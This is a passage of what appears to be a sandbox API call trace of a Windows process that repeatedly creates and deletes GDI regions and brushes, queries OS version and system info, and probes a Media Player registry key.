hrgnSrc2=0x6604027d, iMode=4) returned 2 [0017.833] CreateSolidBrush (color=0xff) returned 0x2100e07 [0017.833] CreateSolidBrush (color=0xff0000) returned 0x1100e0a [0017.833] DeleteObject (ho=0x1100e0a) returned 1 [0017.833] DeleteObject (ho=0x6604027d) returned 1 [0017.833] DeleteObject (ho=0x70040713) returned 1 [0017.833] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.833] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.833] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.833] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.833] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.833] BeginPath (hdc=0x0) returned 0 [0017.833] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.833] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.833] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.833] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.833] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.833] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.833] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.833] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.833] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6704027d [0017.834] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x71040713 [0017.834] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e0b [0017.834] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e0c [0017.834] CombineRgn (hrgnDst=0x1040e0b, hrgnSrc1=0x6704027d, hrgnSrc2=0x71040713, iMode=1) returned 1 [0017.834] CombineRgn (hrgnDst=0x1040e0c, hrgnSrc1=0x6704027d, hrgnSrc2=0x71040713, iMode=4) returned 2 [0017.834] CreateSolidBrush (color=0xff) returned 0x2100e0a [0017.834] CreateSolidBrush (color=0xff0000) returned 0x1100e0d [0017.834] DeleteObject (ho=0x1100e0d) returned 1 [0017.834] DeleteObject (ho=0x71040713) returned 1 [0017.834] DeleteObject (ho=0x6704027d) returned 1 [0017.834] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.834] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.834] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.834] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.834] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.834] BeginPath (hdc=0x0) returned 0 [0017.834] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.834] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.834] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.834] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.834] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.834] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.834] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.834] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.834] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x72040713 [0017.834] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6804027d [0017.834] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e0e [0017.834] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e0f [0017.835] CombineRgn (hrgnDst=0x1040e0e, hrgnSrc1=0x72040713, hrgnSrc2=0x6804027d, iMode=1) returned 1 [0017.835] CombineRgn (hrgnDst=0x1040e0f, hrgnSrc1=0x72040713, hrgnSrc2=0x6804027d, iMode=4) returned 2 [0017.835] CreateSolidBrush (color=0xff) returned 0x2100e0d [0017.835] CreateSolidBrush (color=0xff0000) returned 0x1100e10 [0017.835] DeleteObject (ho=0x1100e10) returned 1 [0017.835] DeleteObject (ho=0x6804027d) returned 1 [0017.835] DeleteObject (ho=0x72040713) returned 1 [0017.835] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.835] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.835] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.835] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.835] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.835] BeginPath (hdc=0x0) returned 0 [0017.835] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.835] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.835] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.835] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.835] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.835] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.835] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.835] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.835] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6904027d [0017.835] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x73040713 [0017.835] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e11 [0017.835] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e12 [0017.835] CombineRgn (hrgnDst=0x1040e11, hrgnSrc1=0x6904027d, hrgnSrc2=0x73040713, iMode=1) returned 1 [0017.835] CombineRgn (hrgnDst=0x1040e12, hrgnSrc1=0x6904027d, hrgnSrc2=0x73040713, iMode=4) returned 2 [0017.835] CreateSolidBrush (color=0xff) returned 0x2100e10 [0017.835] CreateSolidBrush (color=0xff0000) returned 0x1100e13 [0017.836] DeleteObject (ho=0x1100e13) returned 1 [0017.836] DeleteObject (ho=0x73040713) returned 1 [0017.836] DeleteObject (ho=0x6904027d) returned 1 [0017.836] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.836] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.836] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.836] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.836] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.836] BeginPath (hdc=0x0) returned 0 [0017.836] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.836] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.836] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.836] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.836] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.836] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.836] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.836] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.836] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x74040713 [0017.836] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6a04027d [0017.836] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e14 [0017.836] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e15 [0017.836] CombineRgn (hrgnDst=0x1040e14, hrgnSrc1=0x74040713, hrgnSrc2=0x6a04027d, iMode=1) returned 1 [0017.836] CombineRgn (hrgnDst=0x1040e15, hrgnSrc1=0x74040713, hrgnSrc2=0x6a04027d, iMode=4) returned 2 [0017.836] CreateSolidBrush (color=0xff) returned 0x2100e13 [0017.836] CreateSolidBrush (color=0xff0000) returned 0x1100e16 [0017.836] DeleteObject (ho=0x1100e16) returned 1 [0017.836] DeleteObject (ho=0x6a04027d) returned 1 [0017.836] DeleteObject (ho=0x74040713) returned 1 [0017.837] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.837] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.837] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.837] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.837] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.837] BeginPath (hdc=0x0) returned 0 [0017.837] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.837] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.837] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.837] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.837] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.837] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.837] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.837] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.837] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6b04027d [0017.837] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x75040713 [0017.837] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e17 [0017.837] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e18 [0017.837] CombineRgn (hrgnDst=0x1040e17, hrgnSrc1=0x6b04027d, hrgnSrc2=0x75040713, iMode=1) returned 1 [0017.837] CombineRgn (hrgnDst=0x1040e18, hrgnSrc1=0x6b04027d, hrgnSrc2=0x75040713, iMode=4) returned 2 [0017.837] CreateSolidBrush (color=0xff) returned 0x2100e16 [0017.837] CreateSolidBrush (color=0xff0000) returned 0x1100e19 [0017.837] DeleteObject (ho=0x1100e19) returned 1 [0017.837] DeleteObject (ho=0x75040713) returned 1 [0017.837] DeleteObject (ho=0x6b04027d) returned 1 [0017.837] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.837] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.838] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.838] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.838] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.838] BeginPath (hdc=0x0) returned 0 [0017.838] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.838] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.838] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.838] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.838] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.838] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.838] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.838] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x76040713 [0017.838] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6c04027d [0017.838] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e1a [0017.838] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e1b [0017.838] CombineRgn (hrgnDst=0x1040e1a, hrgnSrc1=0x76040713, hrgnSrc2=0x6c04027d, iMode=1) returned 1 [0017.838] CombineRgn (hrgnDst=0x1040e1b, hrgnSrc1=0x76040713, hrgnSrc2=0x6c04027d, iMode=4) returned 2 [0017.838] CreateSolidBrush (color=0xff) returned 0x2100e19 [0017.838] CreateSolidBrush (color=0xff0000) returned 0x1100e1c [0017.838] DeleteObject (ho=0x1100e1c) returned 1 [0017.838] DeleteObject (ho=0x6c04027d) returned 1 [0017.838] DeleteObject (ho=0x76040713) returned 1 [0017.838] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.838] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.838] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.839] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.839] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.839] BeginPath (hdc=0x0) returned 0 [0017.839] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.839] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.839] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.839] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.839] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.839] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.839] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.839] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.855] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6d04027d [0017.855] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x77040713 [0017.855] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e1d [0017.855] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e1e [0017.855] CombineRgn (hrgnDst=0x1040e1d, hrgnSrc1=0x6d04027d, hrgnSrc2=0x77040713, iMode=1) returned 1 [0017.855] CombineRgn (hrgnDst=0x1040e1e, hrgnSrc1=0x6d04027d, hrgnSrc2=0x77040713, iMode=4) returned 2 [0017.855] CreateSolidBrush (color=0xff) returned 0x2100e1c [0017.855] CreateSolidBrush (color=0xff0000) returned 0x1100e1f [0017.855] DeleteObject (ho=0x1100e1f) returned 1 [0017.855] DeleteObject (ho=0x77040713) returned 1 [0017.855] DeleteObject (ho=0x6d04027d) returned 1 [0017.855] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.855] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.855] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.855] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.855] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.856] BeginPath (hdc=0x0) returned 0 [0017.856] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.856] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.856] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.856] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.856] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.856] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.856] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.856] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.856] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x78040713 [0017.856] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6e04027d [0017.856] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e20 [0017.856] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e21 [0017.856] CombineRgn (hrgnDst=0x1040e20, hrgnSrc1=0x78040713, hrgnSrc2=0x6e04027d, iMode=1) returned 1 [0017.856] CombineRgn (hrgnDst=0x1040e21, hrgnSrc1=0x78040713, hrgnSrc2=0x6e04027d, iMode=4) returned 2 [0017.856] CreateSolidBrush (color=0xff) returned 0x2100e1f [0017.856] CreateSolidBrush (color=0xff0000) returned 0x1100e22 [0017.856] DeleteObject (ho=0x1100e22) returned 1 [0017.856] DeleteObject (ho=0x6e04027d) returned 1 [0017.856] DeleteObject (ho=0x78040713) returned 1 [0017.856] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.856] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.856] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.856] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.856] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.856] BeginPath (hdc=0x0) returned 0 [0017.856] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.856] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.857] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.857] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.857] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.857] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.857] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.857] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.857] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6f04027d [0017.857] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x79040713 [0017.857] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e23 [0017.857] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e24 [0017.857] CombineRgn (hrgnDst=0x1040e23, hrgnSrc1=0x6f04027d, hrgnSrc2=0x79040713, iMode=1) returned 1 [0017.857] CombineRgn (hrgnDst=0x1040e24, hrgnSrc1=0x6f04027d, hrgnSrc2=0x79040713, iMode=4) returned 2 [0017.857] CreateSolidBrush (color=0xff) returned 0x2100e22 [0017.857] CreateSolidBrush (color=0xff0000) returned 0x1100e25 [0017.857] DeleteObject (ho=0x1100e25) returned 1 [0017.857] DeleteObject (ho=0x79040713) returned 1 [0017.857] DeleteObject (ho=0x6f04027d) returned 1 [0017.857] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.857] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, 